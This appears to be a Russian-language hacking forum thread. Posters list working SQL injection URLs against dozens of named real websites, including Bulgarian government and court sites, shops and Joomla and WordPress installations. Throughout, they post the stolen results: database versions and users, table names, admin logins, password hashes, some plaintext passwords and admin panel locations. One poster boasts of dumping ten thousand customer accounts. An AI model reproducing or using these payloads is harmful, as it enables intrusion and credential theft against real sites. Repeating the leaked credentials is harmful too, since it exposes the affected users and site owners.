SQL Инъекции

http://tests.vratza.com/

HTML:

http://tests.vratza.com/material.php?id=11+UNION+SELECT+1,2,null,CONVERT(concat_ws(0x3a,version(),user(),database())+USING+LATIN1),5,6,7,8,9,10/*

5.0.18-Max:vratza@localhost:vratza_com_-_vratza

HTML:

http://tests.vratza.com/material.php?id=11+UNION+SELECT+1,2,null,CONVERT(table_name+USING+LATIN1),5,6,7,8,9,10+FROM+information_schema.tables/*

...
bulgariahouse_users
bulgariatour_users
dhc_users
inv_users
limestone_users
otc_users
phpads_clients
ptg_users
rcz_users
vik_users
visit_users
vratzata_users
...

HTML:

http://tests.vratza.com/material.php?id=11+UNION+SELECT+1,2,null,CONVERT(concat_ws(0x3a,user,pass)+USING+LATIN1),5,6,7,8,9,10+FROM+users/*

admin:1a443982b6068cd6f44624f324f4bd1e::bil274
hotfm:9bb312efb1c1d4e51e4c696b7626f00b

 

Code:

http://edu.kzn.ru/russian/news/education_rf/id=-1+union+select+1,2,version(),4,5,database(),7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21/*

версия 4.0.21
database tatedu
user tatedu@localhost

 

Code:

http://www.soaw.org/newswire_detail.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

[email protected]:4.1.21:soaworg

Code:

http://dscripts.awardspace.com/scripts.php?id=-1+union+select+1,2,3,4,5,6,cast(concat_ws(0x3a,user(),version(),database())+as+binary),8,9,10,11,12,13/*&action=guide

[email protected]:4.1.18-log:dburhan_db

 

4.1.22
pr6
-----------------------------------------------------

4.1.7
root:6aee13f5467031e6:localhost ((
-----------------------------------------------------
www.bulgariatour.org
5.0.18-Max

admin:*588D8374F5C7ED3D9D9E25022C999F40A371CB5B:bil274

admin:1a443982b6068cd6f44624f324f4bd1e:bil274
hotfm:9bb312efb1c1d4e51e4c696b7626f00b

 

Болгария must die!

http://www.buildingoftheyear.bg/

HTML:

http://www.buildingoftheyear.bg/vote.php?id=-273+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8/*

5.0.32-Debian_7etch5-log:boty_user@localhost:boty

http://bg-interface.net/

HTML:

http://bg-interface.net/view.php?id=-112+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16/*

4.1.22:kitchenb_kitchen@localhost:kitchenb_bginteface

http://www.bar.bg/

HTML:

http://www.bar.bg/designs/inox2_bg.php?id=292+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,version(),user(),database()),28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68/*

5.0.45-community:barbg_site@localhost:barbg_bar

http://nij.court-bg.org/

HTML:

http://nij.court-bg.org/bg/info.php?id=-10+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12/*

5.0.45-Debian_1:root@localhost:nij

http://sofiacouncil.bg/

HTML:

http://sofiacouncil.bg/index.php?page=news&id=-75+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9/*

4.0.21-log:sosadm@localhost:sosdb

http://www.cem.bg/

HTML:

http://www.cem.bg/r.php?sitemap_id=78&id=-2345+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5/*

4.0.24_Debian-10sarge2-log:cemdb@localhost:cem

http://www.savoyrent.com/

HTML:

http://www.savoyrent.com/r.php?sitemap_id=32&id=-154+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8/*

4.0.24_Debian-10sarge2-log:savoy@localhost:savoy_new

http://www.hillman.bg/

HTML:

http://www.hillman.bg/show_product.php?id=-57+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x3a,version(),user(),database()),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*&selected_id=57

5.0.33-log:hillman@localhost:hillman

http://mtexbg.com/

HTML:

http://mtexbg.com/products.php?id=131+and(1=2)+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/*

4.0.27-standard:mtexbg@localhost:mtexbg_mtex

 

Code:

http://www.incharacter.org/article.php?article=null/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,user(),database(),version()),4,5,6/*

templeton@localhost:incharacter:4.0.21-nt

 

HTML:

http://www.uprava.org/section.php?id=9999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7/*

4.0.27
[email protected]
uprava-org

HTML:

http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*

4.0.27-standard-log
i-shop@localhost
I-shop

 

Code:

http://shop.nourost.ru/index.php?cat=100500%20UNION%20SELECT%20NULL,NULL,CONCAT(USER(),0x3a,VERSION(),0x3a,DATABASE()),NULL,NULL,NULL--
http://www.mks-ks.ru/shop/cat.php?id=100500+UNION+SELECT+1,2,3,CONCAT(USER(),0x3a,VERSION(),0x3a,DATABASE())--

 

Code:

http://www.pilot-film.com/index.php?id=99999999+union+select+0,concat(100500),0,0,0,0,0,0,0,0,0/*
http://www.gamesfirst.com/index.php?id=999999+union+select+concat(username,0x3a,password),concat(user(),0x3a,version(),0x3a,database()),0+from+users/*

 

Вчера не было времени таблицы искать....
вот типо продолжение

Code:

http://edu.kzn.ru/russian/news/education_rf/id=-1+union+select+1,2,login,4,5,passwd,7,8,9,10,11,12,id,14,15,16,17,18,19,20,21+from+user/*

yarr:226d4a1166705006

 

Code:

http://aquarella.portraits.free.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://brodnica.com.pl/powiat/index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
http://getawebsite.co.za/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://houston.windowssupport.us/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://kamilo.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://netrou.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://parkhaus-occamstrasse.de/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://pibbca.org.br/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.adeosys.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.amisaquero.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.biodigital.pt/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.bugesco.be/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.diariometropolitano.com/rmbs/index.php?option=com_nicetalk&tagid=-1)+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,p  assword),12,13,14,15,16,17,18+FROM+jos_users--
http://www.dip-gradjenje.hr/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.espritmx.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.experience-digitale.com/services/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.fogl.co.yu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.genim.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.happyboots.ch/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.hatfielddesign.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.infobit.si/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.itelcom.de/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.laniq.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.mxpro-racing.com/web05/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.ninaris.hu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.pcl-assistance.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.povecalo.com/site/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.ptsims.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.rhinoportail.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.salatiello.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.samrotoli.biz/site/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.sepangaircraft.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
http://www.sisred.com/Joomla/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
http://www.siteinternet.re/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.uralmetall.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.web-upp.de/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*

 

мускул инж

 

PHP:

http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat(login,0x3a,pass,0x3a,email),3,id,5+from+customers/*

10k акков... надеюсь, никто не пострадает

 

для просмотра меняем лимиты

 

Искал аккорды на гитару нашёл скулю))
Довольно хитрая фильтрация, без ковычки перед union ничего не пашет

Code:

http://tabcrawler.com/search.php?show=artist-list&letter=-1'+union+select+password+from+mysql.user/*

root: 46b0f804077918b1
*d450d21dcc39df8471df867995cec28cb04061bf
Пятая ветка, таблицы выкладываются сразу все списком

Code:

http://tabcrawler.com/search.php?show=artist-list&letter=-1'+union+select+Table_name+from+information_schema.tables/*

 

http://www.aiim.org/standards.asp?id=-1+or+1=@@version--

Microsoft SQL Server 7.00 - 7.00.961 (Intel X86) Oct 24 2000 18:39:12 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://www.aiim.org/standards.asp?id=-1+or+1=(select+system_user)--

aiimwebuser

http://www.aiim.org/standards.asp?id=-1+or+1=(select+db_name())--

CGIWEB
-----------------------------------------------------------------------------
lisenok.ru

http://www.lisenok.ru/look.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5/*

5.0.45-log/liseno_liseno/liseno_liseno@localhost


http://www.lisenok.ru/look.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password),5+from+users/*

логин/пароль
lis/skyweb
---------------------------------------------------------------------------
allurent.com

http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,version(),database(),user()),9,10,11,12/*

4.1.20/allurent_prod_12507/allurent@localhost


http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,user,Password),9,10,11,12+from+mysql.user/*

root/


http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,name,password),9,10,11,12+from+users/*

имя/пароль
allurite/d1fnt. pW*rD

 

http://pechatnick.com

version(): 5.0.45-log
user(): [email protected] (masterhost; phpmyadmin.masterhost.ru; wmail.masterhost.ru)

Code:

http://pechatnick.com/users/index.phtml?uid=-1+union+select+concat_ws(0x3a,user_id,name,login,email,skype,pass,icq)+from+users+limit+0,1/*

админка: http://pechatnick.com/_admin/
login: tanya
pass: xxx

 

nmspacemuseum.org

Code:

http://www.nmspacemuseum.org/content.php?id=21'%20union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+limit+1,1+--+

4.1.20nmspacemuseum@localhostnmspacemuseum_live

Code:

http://www.nmspacemuseum.org/content.php?id=21'+union+select+1,concat_ws(0x3,user_name,user_pass,user_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit+1,1+--+

adminNMMSH-01[email protected]
Админка: http://www.nmspacemuseum.org/admin/index.php

 

HTML:

http://www.photopips.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

HTML:

http://www.zulan.se/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

HTML:

http://www.pie2020.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

HTML:

http://www.ilmanakbar.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

HTML:

http://localize.org.ua/old/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

Много хешей, не стал шифровать...

HTML:

http://zona.dp.ua/dir/index.php?ParentID=9999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*

5.0.33-standard
[email protected]
zona

HTML:

 http://zona.dp.ua/dir/index.php?ParentID=9999+union+select+1,table_name,3,4,5+from+information_schema.tables/*

несколько интересных таблиц

 

Code:

http://www.frontnational.com/communique_detail.php?id=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4/*

frontnatfn:[email protected]:5.0.44-log

Code:

http://www.itd.cnr.it/news.php?ID=-41+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,4/*

5.0.22-Debian_0ubuntu6.06.5-log
находим интересные таблицы, типа t_admins
и собственно там и находим админа

Code:

http://www.itd.cnr.it/news.php?ID=-41+union+select+1,2,3,concat(username,0x3a,passwd),5,6,7,8,9,0,1,2,3,4+from+telma2.t_admins/*

admin:21232f297a57a5a743894a0e4a801fc3
bettina:ACB4A77114F483CE965A7D55A61D0E4B
судя по базе log: pass
admin:admin